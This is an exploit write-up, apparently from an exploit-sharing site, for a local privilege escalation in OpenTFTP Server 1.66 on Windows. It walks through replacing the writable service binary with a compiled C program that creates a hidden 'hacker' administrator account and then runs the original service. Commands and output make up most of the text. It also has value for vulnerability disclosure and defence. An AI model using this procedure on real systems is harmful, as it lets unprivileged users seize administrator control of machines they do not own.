
OpenTFTP 1.66 - Local Privilege Escalation Vulnerability

13 Feb 2020 | Reported by boku | Type: zdt | Source: 0day.today

OpenTFTP 1.66 local privilege escalation vulnerability. Insecure file and folder permissions allow a low-privilege attacker to replace the service binary and gain administrator control.

Code
# Exploit Title:   OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Author:  boku
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
# Software Link:   https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
# Version:         1.66
# Tested On:       Windows 10 (32-bit)

# About:           
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, 
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." 
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/

# Vulnerability Details:
# On Windows, Open TFTP Server v1.66 suffers from insecure file & folder permissions.
# This allows a low-privilege, local attacker to escalate their permissions to Administrator
# by replacing the 'TFTPServer' service binary with a maliciously crafted binary executable.
# The TFTP Server runs as an 'Auto_Start' service with 'LocalSystem' privileges after the
# default installation. After the attacker has planted the malicious binary, the code will
# be executed with System privileges on the next boot of the Windows device. See PoC below for details.

## Service Information (there is also an Unquoted Service Path)
C:\>sc qc TFTPServer
SERVICE_NAME: TFTPServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\OpenTFTPServer\OpenTFTPServerSP.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Open TFTP Single Port Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

## Insecure Folder Permission
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
                  NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                  BUILTIN\Users:(OI)(CI)(ID)R
                  NT AUTHORITY\Authenticated Users:(ID)C
                  NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

## Insecure File/Service Permission
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
                                       NT AUTHORITY\SYSTEM:(I)(F)
                                       BUILTIN\Users:(I)(RX)
                                       NT AUTHORITY\Authenticated Users:(I)(M)

## Local Privilege Escalation Proof of Concept
#0.  Download & install Open TFTP Server v1.66

#1.  Create low privileged user & change to the user
  C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
  User name                    lowPrivUser
  Local Group Memberships      *Users
  Global Group memberships     *None
  C:\>whoami
  mycomputer\lowprivuser 

#2.  Move the Service EXE to a new name
  C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
        1 file(s) moved.

#3.  Create malicious binary on Kali Linux
  1) Download dependencies
   # apt install gcc-mingw-w64-i686 wine64 -y
  2) Add Admin User C Code
   # cat addAdmin.c
   #include<windows.h>
   int main(void){
    system("net user hacker mypassword /add");
    system("net localgroup Administrators hacker /add");
    WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
    return 0;
   }
  3) Compile Code
   # i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe

#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host 

#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
  C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
        1 file(s) moved.
  C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
  02/12/2020  05:59 PM           288,659 OpenTFTPServerSP.exe
  02/12/2020  06:38 PM           221,560 ~OpenTFTPServerSP.exe

#6. Reboot the Computer

#7. Look at that new Admin
  C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
  User name                    hacker
  Account active               Yes
  Local Group Memberships      *Administrators       *Users

  C:\Users\lowPrivUser>net localgroup Administrators
  Alias name     Administrators
  Comment        Administrators have complete and unrestricted access to the computer/domain

  Members
  -------------------------------------------------------------------------------
  Administrator
  boku
  hacker
